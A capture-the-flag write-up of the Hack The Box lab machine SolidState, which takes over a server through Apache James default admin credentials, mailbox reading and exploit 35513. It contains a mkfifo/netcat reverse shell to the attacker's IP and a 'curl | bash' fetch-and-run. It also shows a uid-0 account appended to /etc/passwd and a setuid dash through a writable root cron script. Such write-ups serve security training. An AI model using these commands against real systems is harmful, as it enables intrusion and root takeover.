Solidstate
Contents
Port scans
u505@kali:~/HTB/Machines/SolidState$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.51 [sudo] password for u505:
Starting masscan 1.0.5 at 2020-05-14 02:58:48 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 22/tcp on 10.10.10.51 Discovered open port 110/tcp on 10.10.10.51 Discovered open port 4555/tcp on 10.10.10.51 Discovered open port 80/tcp on 10.10.10.51 Discovered open port 25/tcp on 10.10.10.51 Discovered open port 119/tcp on 10.10.10.51
u505@kali:~/HTB/Machines/SolidState$ nmap -sC -sV 10.10.10.51 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 20:08 EDT Nmap scan report for solidstate.htb (10.10.10.51) Host is up (0.049s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0) | ssh-hostkey: | 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA) | 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA) |_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519) 25/tcp open smtp JAMES smtpd 2.3.2 |_smtp-commands: solidstate Hello solidstate.htb (10.10.14.28 [10.10.14.28]), 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Home - Solid State Security 110/tcp open pop3 JAMES pop3d 2.3.2 119/tcp open nntp JAMES nntpd (posting ok) Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.06 seconds
We run nmap for port 4555 discovered by masscan and not in usual nmap ports.
u505@kali:~/HTB/Machines/SolidState$ nmap -sC -sV -p 4555 10.10.10.51 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 20:10 EDT Nmap scan report for solidstate.htb (10.10.10.51) Host is up (0.051s latency).
PORT STATE SERVICE VERSION 4555/tcp open james-admin JAMES Remote Admin 2.3.2
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.69 seconds
Web Server (Port 80)
u505@kali:~/HTB/Machines/SolidState$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,html" -r 1 -f -t 1000 -u http://10.10.10.51
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, html | HTTP method: get | Threads: 1000 | Wordlist size: 13784 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-05-13_23-12-05.log
Target: http://10.10.10.51
[23:12:05] Starting: [23:12:07] 403 - 291B - /.html [23:12:07] 200 - 7KB - /about.html [23:12:08] 200 - 1KB - /assets/ [23:12:19] 403 - 292B - /icons/ [23:12:19] 200 - 2KB - /images/ [23:12:19] 200 - 8KB - /index.html [23:12:21] 200 - 17KB - /LICENSE.txt [23:12:28] 200 - 963B - /README.txt [23:12:30] 403 - 300B - /server-status/ [23:12:30] 200 - 8KB - /services.html [23:12:34] Starting: assets/ [23:12:36] 403 - 298B - /assets/.html [23:12:40] 200 - 2KB - /assets/css/ [23:12:43] 200 - 2KB - /assets/fonts/ [23:12:46] 200 - 2KB - /assets/js/ [23:13:00] Starting: icons/ [23:13:00] 403 - 297B - /icons/.html [23:13:15] 200 - 35KB - /icons/README.html [23:13:17] 403 - 298B - /icons/small/ [23:13:19] Starting: images/ [23:13:21] 403 - 298B - /images/.html [23:13:40] Starting: server-status/
Task Completed
Dirsearch doesn't find anything relevant.
Apache James
James Remote Administration tool (port 4555) - user enumeration
u505@kali:~/HTB/Machines/SolidState$ nc solidstate 4555 JAMES Remote Administration Tool 2.3.2 Please enter your login and password Login id: root Password: root Welcome root. HELP for a list of commands listusers Existing accounts 5 user: james user: thomas user: john user: mindy user: mailadmin adduser u505 u505 User u505 added
The default password works. It exists 5 accounts.
James smtp (port 25)
u505@kali:~/HTB/Machines/SolidState$ telnet 10.10.10.51 25
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Wed, 13 May 2020 20:39:10 -0400 (EDT)
EHLO solidstate
250-solidstate Hello solidstate (10.10.14.28 [10.10.14.28])
250-PIPELINING
250 ENHANCEDSTATUSCODES
AUTH LOGIN
334 VXNlcm5hbWU6
We translate the 334 message.
u505@kali:~/HTB/Machines/SolidState$ echo -n "VXNlcm5hbWU6" | base64 -d Username:
The server asks for the username
u505@kali:~/HTB/Machines/SolidState$ echo -n "u505" | base64 dTUwNQ==
We answer u505
dTUwNQ==
334 UGFzc3dvcmQ6
The server asks for the password
u505@kali:~/HTB/Machines/SolidState$ echo -n "UGFzc3dvcmQ6" | base64 -d Password:
dTUwNQ== 235 Authentication Successful MAIL FROM: <u505@gmail.com> 250 2.1.0 Sender <u505@gmail.com> OK RCPT TO: <james> 250 2.1.5 Recipient <james@localhost> OK DATA 354 Ok Send data ending with <CRLF>.<CRLF> Subject: Test
This a test . 250 2.6.0 Message received quit 221 2.0.0 solidstate Service closing transmission channel Connection closed by foreign host.
We send a message with the user, we previously created, but we don't gather new information.
James Remote Administration tool - Change users passwords
We reconnect the remote administration tool and change users passwords.
u505@kali:~/HTB/Machines/SolidState$ nc solidstate 4555 JAMES Remote Administration Tool 2.3.2 Please enter your login and password Login id: root Password: root Welcome root. HELP for a list of commands listusers Existing accounts 6 user: james user: thomas user: john user: mindy user: u505 user: mailadmin setpassword james james Password for james reset setpassword thomas thomas Password for thomas reset setpassword john john Password for john reset setpassword mindy mindy Password for mindy reset setpassword mailadmin mailadmin Password for mailadmin reset
James Pop3 (port 110) - Read users emails
We changed the users passwords on the previous step, so now we can read users emails.
u505@kali:~/HTB/Machines/SolidState$ telnet 10.10.10.51 110 Trying 10.10.10.51... Connected to 10.10.10.51. Escape character is '^]'. +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready USER james +OK PASS james +OK Welcome james LIST +OK 1 541 1 541 . RETR 1 +OK Message follows Return-Path: <u505@gmail.com> Message-ID: <26717672.1.1589417021199.JavaMail.root@solidstate> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-UserIsAuth: true Delivered-To: james@localhost Received: from 10.10.14.28 ([10.10.14.28]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 29 for <james@localhost>; Wed, 13 May 2020 20:43:39 -0400 (EDT) Date: Wed, 13 May 2020 20:43:39 -0400 (EDT) From: u505@gmail.com Subject: Test
This a test . quit +OK Apache James POP3 Server signing off. Connection closed by foreign host.
This is our previous test to send an email.
u505@kali:~/HTB/Machines/SolidState$ telnet 10.10.10.51 110 Trying 10.10.10.51... Connected to 10.10.10.51. Escape character is '^]'. +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready USER thomas +OK PASS thomas +OK Welcome thomas LIST +OK 0 0 . quit +OK Apache James POP3 Server signing off. Connection closed by foreign host.
Nothing here.
u505@kali:~/HTB/Machines/SolidState$ telnet 10.10.10.51 110 Trying 10.10.10.51... Connected to 10.10.10.51. Escape character is '^]'. +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready USER john +OK PASS john +OK Welcome john LIST +OK 1 743 1 743 . RETR 1 +OK Message follows Return-Path: <mailadmin@localhost> Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Delivered-To: john@localhost Received: from 192.168.11.142 ([192.168.11.142]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581 for <john@localhost>; Tue, 22 Aug 2017 13:16:20 -0400 (EDT) Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT) From: mailadmin@localhost Subject: New Hires access John,
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
Thank you in advance.
Respectfully, James
. quit +OK Apache James POP3 Server signing off. Connection closed by foreign host.
This was something.
u505@kali:~/HTB/Machines/SolidState$ telnet 10.10.10.51 110 Trying 10.10.10.51... Connected to 10.10.10.51. Escape character is '^]'. +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready USER mindy +OK PASS mindy +OK Welcome mindy LIST +OK 2 1945 1 1109 2 836 . RETR 1 +OK Message follows Return-Path: <mailadmin@localhost> Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Delivered-To: mindy@localhost Received: from 192.168.11.142 ([192.168.11.142]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798 for <mindy@localhost>; Tue, 22 Aug 2017 13:13:42 -0400 (EDT) Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT) From: mailadmin@localhost Subject: Welcome
Dear Mindy, Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully, James . RETR 2 +OK Message follows Return-Path: <mailadmin@localhost> Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Delivered-To: mindy@localhost Received: from 192.168.11.142 ([192.168.11.142]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581 for <mindy@localhost>; Tue, 22 Aug 2017 13:17:28 -0400 (EDT) Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT) From: mailadmin@localhost Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login. Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy pass: P@55W0rd1!2@
Respectfully, James
. quit +OK Apache James POP3 Server signing off. Connection closed by foreign host.
We catch Mindy's password.
u505@kali:~/HTB/Machines/SolidState$ telnet 10.10.10.51 110 Trying 10.10.10.51... Connected to 10.10.10.51. Escape character is '^]'. +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready USER mailadmin +OK PASS mailadmin +OK Welcome mailadmin LIST +OK 0 0 . quit +OK Apache James POP3 Server signing off. Connection closed by foreign host.
User flag
u505@kali:~/HTB/Machines/SolidState$ ssh mindy@solidstate.htb mindy@solidstate.htb's password: Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142 mindy@solidstate:~$ cat user.txt <USER_FLAG>
We catch the user flag, but the shell is restricted.
mindy@solidstate:~$ cd / -rbash: cd: restricted mindy@solidstate:~$ bash -rbash: bash: command not found mindy@solidstate:~$ /bin/bash -rbash: /bin/bash: restricted: cannot specify `/' in command names mindy@solidstate:~$ ls -l total 8 drwxr-x--- 2 mindy mindy 4096 Aug 22 2017 bin -rw------- 1 mindy mindy 33 Sep 8 2017 user.txt mindy@solidstate:~$ echo $PATH /home/mindy/bin mindy@solidstate:~$ ls -l bin total 0 lrwxrwxrwx 1 root root 8 Aug 22 2017 cat -> /bin/cat lrwxrwxrwx 1 root root 8 Aug 22 2017 env -> /bin/env lrwxrwxrwx 1 root root 7 Aug 22 2017 ls -> /bin/ls
This shell is restricted to these 3 commands: cat env and ls.
mindy@solidstate:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
james:x:1000:1000:james:/home/james/:/bin/bash
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash
By-pass restricted shell
Changing the pseudo terminal
u505@kali:~/HTB/Machines/SolidState$ ssh mindy@solidstate.htb -t "/bin/bash"
mindy@solidstate.htb's password:
rbash: /bin/bash: restricted: cannot specify `/' in command names
Connection to solidstate.htb closed.
rbash is called and doesn't allow to execute /bin/bash, because of the slash.
u505@kali:~/HTB/Machines/SolidState$ ssh mindy@solidstate.htb -t bash mindy@solidstate.htb's password: ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo $PATH /usr/local/bin:/usr/bin:/bin:/usr/games
After a few test, it seems the call of the bash interpreter as pseudo terminal it's done before the profile is loaded, and the variable PATH is not set yet.
Alternative - exploit 35513 (Apache James Server 2.3.2 - Remote Command Execution)
505@kali:~/HTB/Machines/SolidState$ searchsploit james 2.3.2
------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------ ----------------------------------------
Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write | exploits/linux/remote/48130.rb
Apache James Server 2.3.2 - Remote Command Execution | exploits/linux/remote/35513.py
------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
----------------------------------------------------------------- -----------------------------------------------
Paper Title | Path
| (/usr/share/exploitdb-papers/)
----------------------------------------------------------------- -----------------------------------------------
Exploiting Apache James Server 2.3.2 | docs/english/40123-exploiting-apache-james-ser
----------------------------------------------------------------- -----------------------------------------------
u505@kali:~/HTB/Machines/SolidState$ searchsploit -m 35513
Exploit: Apache James Server 2.3.2 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/35513
Path: /usr/share/exploitdb/exploits/linux/remote/35513.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/SolidState/35513.py
u505@kali:~/HTB/Machines/SolidState$ dos2unix 35513.py
dos2unix: converting file 35513.py to Unix format...
This exploit uses the JAMES Remote Administration Tool to login (credentials are needed), to create a user ../../../../../../../../etc/bash_completion.d. After the user creation, it send a mail with a payload. The smtp server will create a new file with the mail in the user folder. If the user folder doesn't exists it creates it. Because the LFI in the name of the user, the payload will be created as a file in the folder /etc/bash_completion.d. The content of this folder is loaded at each login of a user.
u505@kali:~/HTB/Machines/SolidState$ grep -v "^#" 35513.py | head
import socket import sys import time
payload = '/bin/bash' user = 'root' pwd = 'root'
if len(sys.argv) != 2:
We update the file with our payload. Our payload will simply execute the interpreter bash before rbash.
u505@kali:~/HTB/Machines/SolidState$ ./35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
Now if we log as mindy, at first we have all the errors of the mail headers, but it executes /bin/bash, and the system provides us with a full shell.
u505@kali:~/HTB/Machines/SolidState$ ssh mindy@solidstate.htb mindy@solidstate.htb's password: Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu May 14 17:00:26 2020 from 10.10.14.28 -rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found -rbash: L: command not found -rbash: attributestLjava/util/HashMap: No such file or directory -rbash: L errorMessagetLjava/lang/String: No such file or directory -rbash: L lastUpdatedtLjava/util/Date: No such file or directory -rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory -rbash: $'L\004nameq~\002L': command not found -rbash: recipientstLjava/util/Collection: No such file or directory -rbash: L: command not found -rbash: $'remoteAddrq~\002L': command not found -rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory -rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found -rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found -rbash: @team.pl> Message-ID: <19837922.0.1589489971093.JavaMail.root@solidstate> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost Received: from 10.10.14.28 ([10.10.14.28]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 73 for <../../../../../../../../etc/bash_completion.d@localhost>; Thu, 14 May 2020 16:59:30 -0400 (EDT) Date: Thu, 14 May 2020 16:59:30 -0400 (EDT) From: team@team.pl
: No such file or directory ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo $PATH /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -l /etc/bash_completion.d/ total 24 -rw-r--r-- 1 root root 736 May 14 16:59 4D61696C313538393438393937313037322D30.Repository.FileObjectStore -rw-r--r-- 1 root root 573 May 14 16:59 4D61696C313538393438393937313037322D30.Repository.FileStreamStore -rw-r--r-- 1 root root 439 Aug 9 2017 git-prompt -rw-r--r-- 1 root root 11144 Feb 11 2017 grub ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /etc/bash_completion.d/4D61696C313538393438393937313037322D30.Repository.FileStreamStore Return-Path: <'@team.pl> Message-ID: <19837922.0.1589489971093.JavaMail.root@solidstate> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost Received: from 10.10.14.28 ([10.10.14.28]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 73 for <../../../../../../../../etc/bash_completion.d@localhost>; Thu, 14 May 2020 16:59:30 -0400 (EDT) Date: Thu, 14 May 2020 16:59:30 -0400 (EDT) From: team@team.pl
' /bin/bash ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ exit exit -rbash: $'\r': command not found mindy@solidstate:~$ echo $PATH /home/mindy/bin mindy@solidstate:~$ exit logout Connection to solidstate.htb closed.
We can see the "email" executed before the login. Once we exit the /bin/bash, the login process terminates and opens the restricted shell.
Enumeration
LinEnum.sh
We prepare our webserver with LinEnum.sh script
u505@kali:~/HTB/Machines/SolidState$ mkdir www u505@kali:~/HTB/Machines/SolidState$ cd www/ u505@kali:~/HTB/Machines/SolidState/www$ cp /opt/utils/LinEnum/LinEnum.sh ./ u505@kali:~/HTB/Machines/SolidState/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
And we execute it.
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ curl http://10.10.14.28/LinEnum.sh | bash
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 46642 100 46642 0 0 180k 0 --:--:-- --:--:-- --:--:-- 180k
...
[-] Users that have previously logged onto the system:
Username Port From Latest
root pts/0 10.10.14.2 Sat Dec 23 19:21:34 -0500 2017
mindy pts/0 10.10.14.28 Wed May 13 21:45:04 -0400 2020
...
uid=1000(james) gid=1000(osboxes) groups=1000(osboxes),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth),114(lpadmin),116(scanner)
...
james:x:1000:1000:james:/home/james/:/bin/bash
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash
...
[-] Files not owned by user but writable by group:
-rwxrwxrwx 1 root root 105 Aug 22 2017 /opt/tmp.py
...
[-] Root is allowed to login via SSH:
PermitRootLogin yes
...
We take a look at the file tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ file /opt/tmp.py
/opt/tmp.py: Python script, ASCII text executable
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -l /opt/tmp.py
-rwxrwxrwx 1 root root 105 Aug 22 2017 /opt/tmp.py
Pspy
We copy pspy in our web server.
u505@kali:~/HTB/Machines/SolidState/www$ cp /opt/utils/pspy/pspy32 ./ u505@kali:~/HTB/Machines/SolidState/www$ sudo python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
Download and execution.
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ wget http://10.10.14.28/pspy32
--2020-05-13 21:57:16-- http://10.10.14.28/pspy32
Connecting to 10.10.14.28:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2656352 (2.5M) [application/octet-stream]
Saving to: ‘pspy32’
pspy32 100%[===================>] 2.53M 2.35MB/s in 1.1s
2020-05-13 21:57:17 (2.35 MB/s) - ‘pspy32’ saved [2656352/2656352]
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ chmod +x pspy32
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ ./pspy32
...
2020/05/13 22:03:01 CMD: UID=0 PID=1945 | /bin/sh -c python /opt/tmp.py
2020/05/13 22:03:01 CMD: UID=0 PID=1946 | python /opt/tmp.py
2020/05/13 22:03:01 CMD: UID=0 PID=1947 | sh -c rm -r /tmp/*
As expected after a few minutes the script tmp.py is executed as root.
Privileges escalation
Open a root reverse shell
We add a line to execute a reverse shell.
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 4444 >/tmp/f')
except:
sys.exit()
We open a listener.
u505@kali:~/HTB/Machines/SolidState$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
After a few minutes, the reverse shell is opened.
u505@kali:~/HTB/Machines/SolidState$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.51. Ncat: Connection from 10.10.10.51:55138. /bin/sh: 0: can't access tty; job control turned off # id uid=0(root) gid=0(root) groups=0(root) # python -c "import pty;pty.spawn('/bin/bash')" root@solidstate:~# stty raw -echo stty raw -echo
Alternative add a new user to /etc/passwd
If there is no line for user u505, we add a new line for user u505 with uid 0, guid 0 and password hello.
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ vi tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
os.system(' if [ `grep u505 /etc/passwd |wc -l` -eq 0 ] ; then echo "u505:`openssl passwd hello`:0:0:root:/root:/bin/bash" >> /etc/passwd ; fi ')
except:
After the cron job run
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ tail -n 4 /etc/passwd
sshd:x:117:65534::/run/sshd:/usr/sbin/nologin
james:x:1000:1000:james:/home/james/:/bin/bash
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash
u505:9kstx2Sjsh52k:0:0:root:/root:/bin/bash
And now we can ssh directly with our user u505.
u505@kali:~/HTB/Machines/SolidState/www$ ssh u505@solidstate.htb u505@solidstate.htb's password: Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu May 14 17:55:42 2020 from 10.10.14.28 root@solidstate:~# id uid=0(root) gid=0(root) groups=0(root)
Alternative setuid dash
u505@kali:~/HTB/Machines/SolidState$ /bin/dash -p
$ exit
u505@kali:~/HTB/Machines/SolidState$ man dash
...
-p priviliged Do not attempt to reset effective uid if it does
not match uid. This is not set by default to help
avoid incorrect usage by setuid root programs via
system(3) or popen(3).
...
In our system dash knows the modifier -p. But in the target system it doesn't.
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ /bin/dash -p
/bin/dash: 0: Illegal option -p
It means that if the setuid bit is turned on, it doesn't fallback to the caller user. We can program tmp.py to set the setuid bit in dash. This security is like as bash has not been implemented in this version of dash.
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -l /bin/dash
-rwxr-xr-x 1 root root 124492 Jan 24 2017 /bin/dash
We modify the tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ vi tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
os.system('chmod 4755 /bin/dash')
except:
sys.exit()
After the cron job pass
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -l /bin/dash
-rwsr-xr-x 1 root root 124492 Jan 24 2017 /bin/dash
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ /bin/dash
# id
uid=1001(mindy) gid=1001(mindy) euid=0(root) groups=1001(mindy)
We can observe that bash prevents against this behavior expect if the -p modifier is set. New versions of dash do the fall back as well.
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ /bin/dash
# id
uid=1001(mindy) gid=1001(mindy) euid=0(root) groups=1001(mindy)
# bash
bash-4.4$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
bash-4.4$ exit
exit
# bash -p
bash-4.4# id
uid=1001(mindy) gid=1001(mindy) euid=0(root) groups=1001(mindy)
# exit
exit
# id
uid=1001(mindy) gid=1001(mindy) euid=0(root) groups=1001(mindy)
# exit
Root Flag
root@solidstate:~# cat /root/root.txt <ROOT_FLAG>
References
- https://stackoverflow.com/questions/40499197/how-to-change-a-password-to-an-user-in-apache-james
- https://www.ndchost.com/wiki/mail/test-smtp-auth-telnet
- https://www.shellhacks.com/retrieve-email-pop3-server-command-line/
- https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
Daniel Simao 22:57, 13 May 2020 (EDT)
